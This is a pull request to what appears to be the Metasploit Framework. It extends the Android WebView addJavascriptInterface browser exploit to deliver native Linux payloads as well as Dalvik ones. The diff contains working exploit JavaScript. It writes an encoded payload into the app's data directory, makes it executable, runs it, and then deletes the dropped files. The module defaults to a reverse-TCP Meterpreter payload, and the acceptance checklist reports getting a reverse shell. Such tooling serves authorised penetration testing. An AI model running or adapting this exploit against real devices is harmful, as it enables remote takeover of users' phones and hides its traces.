### PR TITLE
Add support for native target in Android webview exploit

### DIFF
--- a/lib/msf/core/exploit/android.rb
+++ b/lib/msf/core/exploit/android.rb
@@ -19,7 +19,6 @@ module Exploit::Android
   }
 
   def add_javascript_interface_exploit_js(arch)
-    stagename = Rex::Text.rand_text_alpha(5)
     %Q|
       function exec(runtime, cmdArr) {
         var ch = 0;
@@ -47,35 +46,7 @@ module Exploit::Android
                          .getMethod('getRuntime', null)
                          .invoke(null, null);
 
-        // libraryData contains the bytes for a native shared object built via NDK
-        // which will load the "stage", which in this case is our android meterpreter stager.
-        var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
-
-        // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
-        // another stager which loads android meterpreter from the msf handler.
-        var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
-
-        // get the process name, which will give us our data path
-        // $PPID does not seem to work on android 4.0, so we concat pids manually
-        var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
-
-        var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
-        var stagePath = path + '/#{stagename}.apk';
-
-        // build the library and chmod it
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
-        runtime.exec(['chmod', '700', libraryPath]).waitFor();
-
-        // build the stage, chmod it, and load it
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
-        runtime.exec(['chmod', '700', stagePath]).waitFor();
-
-        // load the library
-        runtime.load(libraryPath);
-
-        // delete dropped files
-        runtime.exec(['rm', stagePath]).waitFor();
-        runtime.exec(['rm', libraryPath]).waitFor();
+        #{payload.arch[0] == ARCH_DALVIK ? stager_js(arch) : linux_exe_js(arch)}
 
         return true;
       }
@@ -84,6 +55,62 @@ module Exploit::Android
     |
   end
 
+  def stager_js(arch)
+    stagename = Rex::Text.rand_text_alpha(5)
+    %Q|
+      // libraryData contains the bytes for a native shared object built via NDK
+      // which will load the "stage", which in this case is our android meterpreter stager.
+      var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
+
+      // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
+      // another stager which loads android meterpreter from the msf handler.
+      var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
+
+      // get the process name, which will give us our data path
+      // $PPID does not seem to work on android 4.0, so we concat pids manually
+      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
+      var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
+      var stagePath = path + '/#{stagename}.apk';
+
+      // build the library and chmod it
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
+      runtime.exec(['chmod', '700', libraryPath]).waitFor();
+
+      // build the stage, chmod it, and load it
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
+      runtime.exec(['chmod', '700', stagePath]).waitFor();
+
+      // load the library
+      runtime.load(libraryPath);
+
+      // delete dropped files
+      runtime.exec(['rm', stagePath]).waitFor();
+      runtime.exec(['rm', libraryPath]).waitFor();
+    |
+  end
+
+  def linux_exe_js(arch)
+    platform_list = Msf::Module::PlatformList.new(Msf::Module::Platform::Linux)
+
+    %Q|
+      var payloadData = "#{Rex::Text.to_octal(payload.encoded_exe(arch: arch, platform: platform_list), '\\\\0')}";
+
+      // get the process name, which will give us our data path
+      // $PPID does not seem to work on android 4.0, so we concat pids manually
+      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
+      var payloadPath = path + '/#{Rex::Text.rand_text_alpha(8)}';
+
+      // build the library and chmod it
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+payloadData+'" > '+payloadPath]).waitFor();
+      runtime.exec(['chmod', '700', payloadPath]).waitFor();
+
+      // run the payload
+      runtime.exec(['/system/bin/sh', '-c', payloadPath + ' &']).waitFor();
+
+      // delete dropped files
+      runtime.exec(['rm', payloadPath]).waitFor();
+    |
+  end
 
   # The NDK stager is used to launch a hidden APK
   def ndkstager(stagename, arch)

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -67,8 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ['EDB', '31519'],
         ['OSVDB', '97520']
       ],
-      'Platform'            => 'android',
-      'Arch'                => ARCH_DALVIK,
+      'Platform'            => ['android', 'linux'],
+      'Arch'                => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
       'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
       'Targets'             => [ [ 'Automatic', {} ] ],
       'DisclosureDate'      => 'Dec 21 2012',


### PR DESCRIPTION
This allows native and dalvik payloads to be used. When the payload arch is not dalvik, a second code path is used that just drops, chmods, and executes an arbitrary payload. Fixes #3910.
### A/C:
- [x] get a shell with `android_addjavascriptinterface` and the default Android meterpreter payload
- [x] get a shell with `android_addjavascriptinterface` and a native payload (I used `linux/armle/shell_reverse_tcp`)
